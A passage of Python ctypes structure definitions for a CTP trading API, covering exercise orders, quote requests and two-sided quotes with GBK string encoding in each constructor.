        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, ExecOrderActionRef=None, ExecOrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ExecOrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, ActionType=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExecOrderRef", ExecOrderRef),
            ("ExchangeID", ExchangeID),
            ("ExecOrderSysID", ExecOrderSysID),
            ("ActionFlag", ActionFlag),
            ("ActionDate", ActionDate),
            ("ActionTime", ActionTime),
            ("TraderID", TraderID),
            ("ExecOrderLocalID", ExecOrderLocalID),
            ("ActionLocalID", ActionLocalID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("BusinessUnit", BusinessUnit),
            ("OrderActionStatus", OrderActionStatus),
            ("UserID", UserID),
            ("ActionType", ActionType),
            ("StatusMsg", StatusMsg),
            ("InstrumentID", InstrumentID),
            ("BranchID", BranchID),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (
            ("ExecOrderActionRef", ExecOrderActionRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
        ):
            if value:
                setattr(self, field, value)
class QryExecOrder(Struct):
    """Exercise-order query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("ExecOrderSysID", c_char_Array_21),
        ("InsertTimeStart", c_char_Array_9),
        ("InsertTimeEnd", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, ExecOrderSysID=None, InsertTimeStart=None, InsertTimeEnd=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("ExecOrderSysID", ExecOrderSysID),
            ("InsertTimeStart", InsertTimeStart),
            ("InsertTimeEnd", InsertTimeEnd),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class ExchangeExecOrder(Struct):
    """Exchange-side exec-order record; field layout mirrors the native API."""
    _fields_ = [
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("ActionType", c_char),
        ("PosiDirection", c_char),
        ("ReservePositionFlag", c_char),
        ("CloseFlag", c_char),
        ("ExecOrderLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("ExecOrderSysID", c_char_Array_21),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ExecResult", c_char),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("BranchID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExecOrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, ExecOrderSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, BranchID=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryExchangeExecOrder(Struct):
    """Query filter for exchange-side exec orders."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]
    def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryExecOrderAction(Struct):
    """Query filter for exec-order actions."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class ExchangeExecOrderAction(Struct):
    """Exchange-side exec-order action record."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ExecOrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("ExecOrderLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("ActionType", c_char),
        ("BranchID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ExchangeInstID", c_char_Array_31),
        ("Volume", c_int),
    ]
    def __init__(self, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ExecOrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, ActionType=None, BranchID=None, IPAddress=None, MacAddress=None, ExchangeInstID=None, Volume=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryExchangeExecOrderAction(Struct):
    """Query filter for exchange-side exec-order actions."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]
    def __init__(self, ParticipantID=None, ClientID=None, ExchangeID=None, TraderID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class ErrExecOrder(Struct):
    """Errored exec-order record (original input plus ErrorID/ErrorMsg)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExecOrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("ActionType", c_char),
        ("PosiDirection", c_char),
        ("ReservePositionFlag", c_char),
        ("CloseFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExecOrderRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None, ErrorID=None, ErrorMsg=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryErrExecOrder(Struct):
    """Query filter for errored exec orders."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class ErrExecOrderAction(Struct):
    """Errored exec-order-action record (action input plus ErrorID/ErrorMsg)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExecOrderActionRef", c_int),
        ("ExecOrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("ExecOrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("UserID", c_char_Array_16),
        ("InstrumentID", c_char_Array_31),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ExecOrderActionRef=None, ExecOrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None, ErrorID=None, ErrorMsg=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryErrExecOrderAction(Struct):
    """Query filter for errored exec-order actions."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class OptionInstrTradingRight(Struct):
    """Option-instrument trading-right record."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("Direction", c_char),
        ("TradingRight", c_char),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, Direction=None, TradingRight=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryOptionInstrTradingRight(Struct):
    """Query filter for option-instrument trading rights."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("Direction", c_char),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, Direction=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class InputForQuote(Struct):
    """Input record for a quote request (for-quote)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ForQuoteRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ForQuoteRef=None, UserID=None, ExchangeID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class ForQuote(Struct):
    """For-quote (quote request) record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ForQuoteRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("ForQuoteLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("ForQuoteStatus", c_char),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("StatusMsg", c_char_Array_81),
        ("ActiveUserID", c_char_Array_16),
        ("BrokerForQutoSeq", c_int),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ForQuoteRef=None, UserID=None, ForQuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, InsertDate=None, InsertTime=None, ForQuoteStatus=None, FrontID=None, SessionID=None, StatusMsg=None, ActiveUserID=None, BrokerForQutoSeq=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryForQuote(Struct):
    """Query filter for for-quote records."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InsertTimeStart", c_char_Array_9),
        ("InsertTimeEnd", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InsertTimeStart=None, InsertTimeEnd=None, InvestUnitID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class ExchangeForQuote(Struct):
    """Exchange-side for-quote record."""
    _fields_ = [
        ("ForQuoteLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("ForQuoteStatus", c_char),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, ForQuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, InsertDate=None, InsertTime=None, ForQuoteStatus=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryExchangeForQuote(Struct):
    """Query filter for exchange-side for-quote records."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]
    def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
        """GBK-encode and assign each truthy string argument; skip falsy ones."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class InputQuote(Struct):
    """Input record for submitting a two-sided quote."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("QuoteRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("AskPrice", c_double),
        ("BidPrice", c_double),
        ("AskVolume", c_int),
        ("BidVolume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("AskOffsetFlag", c_char),
        ("BidOffsetFlag", c_char),
        ("AskHedgeFlag", c_char),
        ("BidHedgeFlag", c_char),
        ("AskOrderRef", c_char_Array_13),
        ("BidOrderRef", c_char_Array_13),
        ("ForQuoteSysID", c_char_Array_21),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, QuoteRef=None, UserID=None, AskPrice=None, BidPrice=None, AskVolume=None, BidVolume=None, RequestID=None, BusinessUnit=None, AskOffsetFlag=None, BidOffsetFlag=None, AskHedgeFlag=None, BidHedgeFlag=None, AskOrderRef=None, BidOrderRef=None, ForQuoteSysID=None, ExchangeID=None, InvestUnitID=None, ClientID=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, numbers stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class InputQuoteAction(Struct):
    """Input record for a quote action (e.g. cancellation)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("QuoteActionRef", c_int),
        ("QuoteRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("QuoteSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("UserID", c_char_Array_16),
        ("InstrumentID", c_char_Array_31),
        ("InvestUnitID", c_char_Array_17),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, QuoteActionRef=None, QuoteRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, QuoteSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, ClientID=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class Quote(Struct):
    """Full quote record as reported back by the trading front end."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("QuoteRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("AskPrice", c_double),
        ("BidPrice", c_double),
        ("AskVolume", c_int),
        ("BidVolume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("AskOffsetFlag", c_char),
        ("BidOffsetFlag", c_char),
        ("AskHedgeFlag", c_char),
        ("BidHedgeFlag", c_char),
        ("QuoteLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("NotifySequence", c_int),
        ("OrderSubmitStatus", c_char),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("QuoteSysID", c_char_Array_21),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("QuoteStatus", c_char),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("AskOrderSysID", c_char_Array_21),
        ("BidOrderSysID", c_char_Array_21),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("UserProductInfo", c_char_Array_11),
        ("StatusMsg", c_char_Array_81),
        ("ActiveUserID", c_char_Array_16),
        ("BrokerQuoteSeq", c_int),
        ("AskOrderRef", c_char_Array_13),
        ("BidOrderRef", c_char_Array_13),
        ("ForQuoteSysID", c_char_Array_21),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, QuoteRef=None, UserID=None, AskPrice=None, BidPrice=None, AskVolume=None, BidVolume=None, RequestID=None, BusinessUnit=None, AskOffsetFlag=None, BidOffsetFlag=None, AskHedgeFlag=None, BidHedgeFlag=None, QuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, NotifySequence=None, OrderSubmitStatus=None, TradingDay=None, SettlementID=None, QuoteSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, QuoteStatus=None, ClearingPartID=None, SequenceNo=None, AskOrderSysID=None, BidOrderSysID=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, ActiveUserID=None, BrokerQuoteSeq=None, AskOrderRef=None, BidOrderRef=None, ForQuoteSysID=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, numbers stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QuoteAction(Struct):
    """Quote-action record (status of a quote cancellation/modification)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("QuoteActionRef", c_int),
        ("QuoteRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("QuoteSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("QuoteLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("StatusMsg", c_char_Array_81),
        ("InstrumentID", c_char_Array_31),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, QuoteActionRef=None, QuoteRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, QuoteSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, QuoteLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """Assign truthy arguments; strings are GBK-encoded, ints stored as-is."""
        supplied = dict(locals())
        super().__init__()
        for name, value in supplied.items():
            if name == "self" or not value:
                continue
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryQuote(Struct):
    """CTP quote-query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("QuoteSysID", c_char_Array_21),
        ("InsertTimeStart", c_char_Array_9),
        ("InsertTimeEnd", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, QuoteSysID=None, InsertTimeStart=None, InsertTimeEnd=None, InvestUnitID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("QuoteSysID", QuoteSysID),
            ("InsertTimeStart", InsertTimeStart),
            ("InsertTimeEnd", InsertTimeEnd),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class ExchangeQuote(Struct):
    """CTP exchange-side quote structure (two-sided prices plus routing/status data)."""
    _fields_ = [
        ("AskPrice", c_double),
        ("BidPrice", c_double),
        ("AskVolume", c_int),
        ("BidVolume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("AskOffsetFlag", c_char),
        ("BidOffsetFlag", c_char),
        ("AskHedgeFlag", c_char),
        ("BidHedgeFlag", c_char),
        ("QuoteLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("NotifySequence", c_int),
        ("OrderSubmitStatus", c_char),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("QuoteSysID", c_char_Array_21),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("QuoteStatus", c_char),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("AskOrderSysID", c_char_Array_21),
        ("BidOrderSysID", c_char_Array_21),
        ("ForQuoteSysID", c_char_Array_21),
        ("BranchID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, AskPrice=None, BidPrice=None, AskVolume=None, BidVolume=None, RequestID=None, BusinessUnit=None, AskOffsetFlag=None, BidOffsetFlag=None, AskHedgeFlag=None, BidHedgeFlag=None, QuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, NotifySequence=None, OrderSubmitStatus=None, TradingDay=None, SettlementID=None, QuoteSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, QuoteStatus=None, ClearingPartID=None, SequenceNo=None, AskOrderSysID=None, BidOrderSysID=None, ForQuoteSysID=None, BranchID=None, IPAddress=None, MacAddress=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("BusinessUnit", BusinessUnit),
            ("AskOffsetFlag", AskOffsetFlag),
            ("BidOffsetFlag", BidOffsetFlag),
            ("AskHedgeFlag", AskHedgeFlag),
            ("BidHedgeFlag", BidHedgeFlag),
            ("QuoteLocalID", QuoteLocalID),
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("TraderID", TraderID),
            ("OrderSubmitStatus", OrderSubmitStatus),
            ("TradingDay", TradingDay),
            ("QuoteSysID", QuoteSysID),
            ("InsertDate", InsertDate),
            ("InsertTime", InsertTime),
            ("CancelTime", CancelTime),
            ("QuoteStatus", QuoteStatus),
            ("ClearingPartID", ClearingPartID),
            ("AskOrderSysID", AskOrderSysID),
            ("BidOrderSysID", BidOrderSysID),
            ("ForQuoteSysID", ForQuoteSysID),
            ("BranchID", BranchID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("AskPrice", AskPrice),
            ("BidPrice", BidPrice),
            ("AskVolume", AskVolume),
            ("BidVolume", BidVolume),
            ("RequestID", RequestID),
            ("InstallID", InstallID),
            ("NotifySequence", NotifySequence),
            ("SettlementID", SettlementID),
            ("SequenceNo", SequenceNo),
        ):
            if value:
                setattr(self, field, value)
class QryExchangeQuote(Struct):
    """CTP exchange-quote query request structure."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
